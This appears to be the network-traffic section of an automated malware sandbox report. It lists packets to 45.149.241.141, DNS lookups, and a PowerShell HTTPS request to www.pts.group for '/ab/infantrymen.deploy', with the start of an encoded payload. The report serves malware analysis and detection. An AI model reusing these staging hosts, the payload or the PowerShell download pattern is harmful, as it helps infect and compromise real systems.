                                                                                                                  Dec 5, 2024 10:47:14.872939110 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.872956038 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.873835087 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.873876095 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.873883009 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.874813080 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.874861002 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.874891996 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.875950098 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.876012087 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.876039028 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.876701117 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.876837015 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.876895905 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.877692938 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.877876043 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.877929926 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.878634930 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.878813028 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.878868103 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.879477024 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.879568100 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.879621029 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.880462885 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.880554914 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.880606890 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.881340981 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.881469965 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.881522894 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.882265091 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.882318020 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.882395029 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.883255959 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.883305073 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.883331060 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.884207010 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.884263992 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.884308100 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.885210037 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.885258913 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.885329962 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.886089087 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.886176109 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.886224985 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.887043953 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.887157917 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.887206078 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.887924910 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.887969017 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.888055086 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.888863087 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.891585112 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:15.126327038 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:15.246519089 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:15.246586084 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:15.366452932 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:15.651813984 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:15.652005911 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:15.652050972 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:15.652167082 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:15.652220011 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:15.659734964 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:15.771922112 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:15.771975040 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:16.047933102 CET49799443192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:16.047991991 CET4434979945.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:16.048120975 CET49799443192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:16.048266888 CET49799443192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:16.048275948 CET4434979945.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:17.422246933 CET4434979945.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:17.422337055 CET49799443192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:17.426986933 CET49799443192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:17.427006006 CET4434979945.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:17.427341938 CET4434979945.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:17.428956032 CET49799443192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:17.475334883 CET4434979945.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:22.215686083 CET4434979945.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:22.215764999 CET4434979945.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:22.215832949 CET49799443192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:22.215867996 CET49799443192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:22.215883970 CET4434979945.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:22.215919971 CET49799443192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:22.215925932 CET4434979945.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:23.219676971 CET49815443192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:23.219737053 CET4434981545.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:23.219815969 CET49815443192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:23.219894886 CET49815443192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:23.219907045 CET4434981545.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:24.587743044 CET4434981545.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:24.587863922 CET49815443192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:24.592113972 CET49815443192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:24.592127085 CET4434981545.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:24.592365026 CET4434981545.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:24.593153000 CET49815443192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:24.635333061 CET4434981545.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:29.395478964 CET4434981545.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:29.395560980 CET4434981545.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:29.395632029 CET49815443192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:29.395751953 CET49815443192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:29.395771027 CET4434981545.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:29.395817995 CET49815443192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:29.395823956 CET4434981545.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:30.391537905 CET49836443192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:30.391583920 CET4434983645.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:30.391679049 CET49836443192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:30.391758919 CET49836443192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:30.391767025 CET4434983645.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:31.825170040 CET4434983645.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:31.825294971 CET49836443192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:31.829663992 CET49836443192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:31.829677105 CET4434983645.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:31.829951048 CET4434983645.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:31.830719948 CET49836443192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:31.875330925 CET4434983645.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:36.622203112 CET4434983645.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:36.622284889 CET4434983645.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:36.622347116 CET49836443192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:36.622426987 CET49836443192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:36.622445107 CET4434983645.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:37.626065969 CET49852443192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:37.626115084 CET4434985245.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:37.626211882 CET49852443192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:37.626319885 CET49852443192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:37.626329899 CET4434985245.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:38.998884916 CET4434985245.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:38.998980045 CET49852443192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:39.003485918 CET49852443192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:39.003501892 CET4434985245.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:39.003825903 CET4434985245.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:39.004597902 CET49852443192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:39.047342062 CET4434985245.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:43.795239925 CET4434985245.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:43.795330048 CET4434985245.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:43.795438051 CET49852443192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:43.795475006 CET49852443192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:43.795495033 CET4434985245.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:43.795523882 CET49852443192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:43.795536041 CET4434985245.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:44.797848940 CET49868443192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:44.797908068 CET4434986845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:44.797995090 CET49868443192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:44.798064947 CET49868443192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:44.798070908 CET4434986845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:46.164794922 CET4434986845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:46.164920092 CET49868443192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:46.168864965 CET49868443192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:46.168878078 CET4434986845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:46.169142962 CET4434986845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:46.169941902 CET49868443192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:46.215329885 CET4434986845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:50.964152098 CET4434986845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:50.964240074 CET4434986845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:50.964335918 CET49868443192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:50.964394093 CET49868443192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:50.964394093 CET49868443192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:50.964418888 CET4434986845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:50.964426994 CET4434986845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:51.954000950 CET49885443192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:51.954025030 CET4434988545.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:51.954108000 CET49885443192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:51.954191923 CET49885443192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:51.954200029 CET4434988545.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:53.329868078 CET4434988545.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:53.329945087 CET49885443192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:53.334053040 CET49885443192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:53.334073067 CET4434988545.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:53.334352970 CET4434988545.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:53.335057974 CET49885443192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:53.379328966 CET4434988545.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:58.121635914 CET4434988545.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:58.121731043 CET4434988545.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:58.121824980 CET49885443192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:58.121916056 CET49885443192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:58.121932030 CET4434988545.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:59.110416889 CET49905443192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:59.110497952 CET4434990545.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:59.110620975 CET49905443192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:59.110764980 CET49905443192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:59.110779047 CET4434990545.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:48:00.481781006 CET4434990545.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:48:00.481930971 CET49905443192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:48:00.486032009 CET49905443192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:48:00.486038923 CET4434990545.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:48:00.486243010 CET4434990545.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:48:00.486955881 CET49905443192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:48:00.527329922 CET4434990545.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:48:05.283695936 CET4434990545.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:48:05.283791065 CET4434990545.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:48:05.283834934 CET49905443192.168.2.445.149.241.141

                                                                                                                  UDP Packets

                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Dec 5, 2024 10:45:59.263134003 CET6400653192.168.2.41.1.1.1
                                                                                                                  Dec 5, 2024 10:45:59.497145891 CET53640061.1.1.1192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:24.584072113 CET5634253192.168.2.41.1.1.1
                                                                                                                  Dec 5, 2024 10:46:24.722095966 CET53563421.1.1.1192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:44.577723980 CET5172353192.168.2.41.1.1.1
                                                                                                                  Dec 5, 2024 10:46:44.578277111 CET5943953192.168.2.41.1.1.1
                                                                                                                  Dec 5, 2024 10:46:44.578496933 CET5845853192.168.2.41.1.1.1
                                                                                                                  Dec 5, 2024 10:46:44.578677893 CET6283553192.168.2.41.1.1.1
                                                                                                                  Dec 5, 2024 10:46:44.579077005 CET5430653192.168.2.41.1.1.1
                                                                                                                  Dec 5, 2024 10:46:44.579718113 CET5665453192.168.2.41.1.1.1
                                                                                                                  Dec 5, 2024 10:46:44.715928078 CET53517231.1.1.1192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:44.717753887 CET53543061.1.1.1192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:44.719304085 CET53584581.1.1.1192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:44.719835043 CET53594391.1.1.1192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:44.721455097 CET53566541.1.1.1192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:45.256711960 CET53628351.1.1.1192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:45.257472038 CET60802123192.168.2.4129.6.15.28
                                                                                                                  Dec 5, 2024 10:46:45.257515907 CET60802123192.168.2.4216.239.35.0
                                                                                                                  Dec 5, 2024 10:46:45.257618904 CET60802123192.168.2.462.149.0.30
                                                                                                                  Dec 5, 2024 10:46:45.257644892 CET60802123192.168.2.4162.159.200.123
                                                                                                                  Dec 5, 2024 10:46:45.257685900 CET60802123192.168.2.4213.239.239.164
                                                                                                                  Dec 5, 2024 10:46:46.340468884 CET12360802162.159.200.123192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:46.346821070 CET12360802216.239.35.0192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:46.348128080 CET12360802129.6.15.28192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:46.439481020 CET12360802213.239.239.164192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:46.447386980 CET1236080262.149.0.30192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:53.084675074 CET53621881.1.1.1192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:53.851927996 CET53650311.1.1.1192.168.2.4

                                                                                                                  ICMP Packets

                                                                                                                  TimestampSource IPDest IPChecksumCodeType
                                                                                                                  Dec 5, 2024 10:46:53.907377958 CET192.168.2.41.1.1.1c233(Port unreachable)Destination Unreachable

                                                                                                                  DNS Queries

                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                  Dec 5, 2024 10:45:59.263134003 CET192.168.2.41.1.1.10x2a36Standard query (0)www.pts.groupA (IP address)IN (0x0001)false
                                                                                                                  Dec 5, 2024 10:46:24.584072113 CET192.168.2.41.1.1.10xda17Standard query (0)www.tdejb.comA (IP address)IN (0x0001)false
                                                                                                                  Dec 5, 2024 10:46:44.577723980 CET192.168.2.41.1.1.10xe3f2Standard query (0)time.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                  Dec 5, 2024 10:46:44.578277111 CET192.168.2.41.1.1.10x1f20Standard query (0)ntp.time.in.uaA (IP address)IN (0x0001)false
                                                                                                                  Dec 5, 2024 10:46:44.578496933 CET192.168.2.41.1.1.10x9eb6Standard query (0)time.google.comA (IP address)IN (0x0001)false
                                                                                                                  Dec 5, 2024 10:46:44.578677893 CET192.168.2.41.1.1.10x2028Standard query (0)ts1.aco.netA (IP address)IN (0x0001)false
                                                                                                                  Dec 5, 2024 10:46:44.579077005 CET192.168.2.41.1.1.10xbf6dStandard query (0)ntp1.hetzner.deA (IP address)IN (0x0001)false
                                                                                                                  Dec 5, 2024 10:46:44.579718113 CET192.168.2.41.1.1.10xc393Standard query (0)time-a-g.nist.govA (IP address)IN (0x0001)false

                                                                                                                  DNS Answers

                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                  Dec 5, 2024 10:45:59.497145891 CET1.1.1.1192.168.2.40x2a36No error (0)www.pts.grouppts.groupCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Dec 5, 2024 10:45:59.497145891 CET1.1.1.1192.168.2.40x2a36No error (0)pts.group68.66.226.116A (IP address)IN (0x0001)false
                                                                                                                  Dec 5, 2024 10:46:24.722095966 CET1.1.1.1192.168.2.40xda17No error (0)www.tdejb.comtdejb.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Dec 5, 2024 10:46:24.722095966 CET1.1.1.1192.168.2.40xda17No error (0)tdejb.com202.71.109.228A (IP address)IN (0x0001)false
                                                                                                                  Dec 5, 2024 10:46:44.715928078 CET1.1.1.1192.168.2.40xe3f2No error (0)time.cloudflare.com162.159.200.123A (IP address)IN (0x0001)false
                                                                                                                  Dec 5, 2024 10:46:44.715928078 CET1.1.1.1192.168.2.40xe3f2No error (0)time.cloudflare.com162.159.200.1A (IP address)IN (0x0001)false
                                                                                                                  Dec 5, 2024 10:46:44.717753887 CET1.1.1.1192.168.2.40xbf6dNo error (0)ntp1.hetzner.de213.239.239.164A (IP address)IN (0x0001)false
                                                                                                                  Dec 5, 2024 10:46:44.719304085 CET1.1.1.1192.168.2.40x9eb6No error (0)time.google.com216.239.35.0A (IP address)IN (0x0001)false
                                                                                                                  Dec 5, 2024 10:46:44.719304085 CET1.1.1.1192.168.2.40x9eb6No error (0)time.google.com216.239.35.8A (IP address)IN (0x0001)false
                                                                                                                  Dec 5, 2024 10:46:44.719304085 CET1.1.1.1192.168.2.40x9eb6No error (0)time.google.com216.239.35.4A (IP address)IN (0x0001)false
                                                                                                                  Dec 5, 2024 10:46:44.719304085 CET1.1.1.1192.168.2.40x9eb6No error (0)time.google.com216.239.35.12A (IP address)IN (0x0001)false
                                                                                                                  Dec 5, 2024 10:46:44.719835043 CET1.1.1.1192.168.2.40x1f20No error (0)ntp.time.in.ua62.149.0.30A (IP address)IN (0x0001)false
                                                                                                                  Dec 5, 2024 10:46:44.721455097 CET1.1.1.1192.168.2.40xc393No error (0)time-a-g.nist.gov129.6.15.28A (IP address)IN (0x0001)false
                                                                                                                  Dec 5, 2024 10:46:45.256711960 CET1.1.1.1192.168.2.40x2028Server failure (2)ts1.aco.netnonenoneA (IP address)IN (0x0001)false

                                                                                                                  HTTP Request Dependency Graph

                                                                                                                  • www.pts.group
                                                                                                                  • www.tdejb.com

                                                                                                                  HTTPS Proxied Packets

                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  0192.168.2.44973068.66.226.1164437020C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-12-05 09:46:01 UTC178OUTGET /ab/infantrymen.deploy HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                  Host: www.pts.group
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2024-12-05 09:46:01 UTC530INHTTP/1.1 200 OK
                                                                                                                  Connection: close
                                                                                                                  content-type: application/octet-stream
                                                                                                                  last-modified: Wed, 04 Dec 2024 11:10:46 GMT
                                                                                                                  accept-ranges: bytes
                                                                                                                  content-length: 444692
                                                                                                                  date: Thu, 05 Dec 2024 09:46:01 GMT
                                                                                                                  server: LiteSpeed
                                                                                                                  strict-transport-security: max-age=63072000; includeSubDomains
                                                                                                                  x-frame-options: SAMEORIGIN
                                                                                                                  x-content-type-options: nosniff
                                                                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                  2024-12-05 09:46:01 UTC16384INData Raw: 36 77 4b 53 69 33 45 42 6d 37 73 6b 57 42 67 41 36 77 49 78 33 58 45 42 6d 77 4e 63 4a 41 52 78 41 5a 76 72 41 71 45 52 75 57 51 6d 2b 78 72 72 41 69 6d 48 36 77 4a 4e 6e 34 48 78 69 58 74 66 75 65 73 43 6f 65 46 78 41 5a 75 42 36 65 31 64 70 4b 4e 78 41 5a 76 72 41 71 38 62 36 77 49 49 50 2b 73 43 67 4a 32 36 53 6a 33 34 44 75 73 43 67 71 58 72 41 6d 75 61 36 77 49 50 39 6e 45 42 6d 7a 48 4b 63 51 47 62 63 51 47 62 69 52 51 4c 63 51 47 62 36 77 4c 36 56 64 48 69 63 51 47 62 63 51 47 62 67 38 45 45 36 77 4b 33 6c 4f 73 43 63 57 32 42 2b 5a 77 4b 55 51 4a 38 7a 48 45 42 6d 2b 73 43 46 68 57 4c 52 43 51 45 63 51 47 62 63 51 47 62 69 63 4e 78 41 5a 76 72 41 6a 6a 70 67 63 4d 49 74 49 49 42 36 77 4a 58 59 33 45 42 6d 37 6f 79 33 56 4c 52 63 51 47 62 36 77 4a
                                                                                                                  Data Ascii: 6wKSi3EBm7skWBgA6wIx3XEBmwNcJARxAZvrAqERuWQm+xrrAimH6wJNn4HxiXtfuesCoeFxAZuB6e1dpKNxAZvrAq8b6wIIP+sCgJ26Sj34DusCgqXrAmua6wIP9nEBmzHKcQGbcQGbiRQLcQGb6wL6VdHicQGbcQGbg8EE6wK3lOsCcW2B+ZwKUQJ8zHEBm+sCFhWLRCQEcQGbcQGbicNxAZvrAjjpgcMItIIB6wJXY3EBm7oy3VLRcQGb6wJ
                                                                                                                  2024-12-05 09:46:01 UTC16384INData Raw: 56 4b 61 32 41 41 35 4f 73 34 6e 6b 57 53 63 6e 69 37 77 6d 4d 33 48 32 59 4d 47 62 66 31 6f 65 69 36 52 5a 46 67 7a 50 73 61 2b 44 72 75 67 6a 6c 79 6a 59 38 6e 4a 42 62 6d 51 4b 70 42 61 74 2b 73 35 44 71 46 75 64 30 77 70 49 6e 44 62 37 69 4a 69 2f 52 4f 46 43 59 56 4d 59 4a 71 4e 77 75 75 53 38 38 59 30 45 75 51 76 43 46 41 69 66 44 6b 37 68 61 44 75 63 61 4c 59 6b 54 4f 45 7a 67 35 34 74 6b 39 33 4b 6b 2f 6c 48 61 2b 31 46 76 4b 4f 74 4e 57 32 63 54 65 41 49 41 5a 70 71 47 7a 46 42 59 31 6a 30 65 63 5a 35 45 47 44 5a 2f 57 67 6b 57 34 75 4d 5a 67 68 62 52 47 67 35 51 45 64 4d 50 44 6b 46 41 2f 64 52 33 6c 77 39 54 69 67 2f 79 79 57 49 68 2b 4e 64 42 49 46 63 53 4e 6c 4c 42 33 4d 70 73 34 67 79 71 59 59 32 49 52 33 30 34 69 76 66 30 2f 65 6a 50 7a 6f
                                                                                                                  Data Ascii: VKa2AA5Os4nkWScni7wmM3H2YMGbf1oei6RZFgzPsa+DrugjlyjY8nJBbmQKpBat+s5DqFud0wpInDb7iJi/ROFCYVMYJqNwuuS88Y0EuQvCFAifDk7haDucaLYkTOEzg54tk93Kk/lHa+1FvKOtNW2cTeAIAZpqGzFBY1j0ecZ5EGDZ/WgkW4uMZghbRGg5QEdMPDkFA/dR3lw9Tig/yyWIh+NdBIFcSNlLB3Mps4gyqYY2IR304ivf0/ejPzo
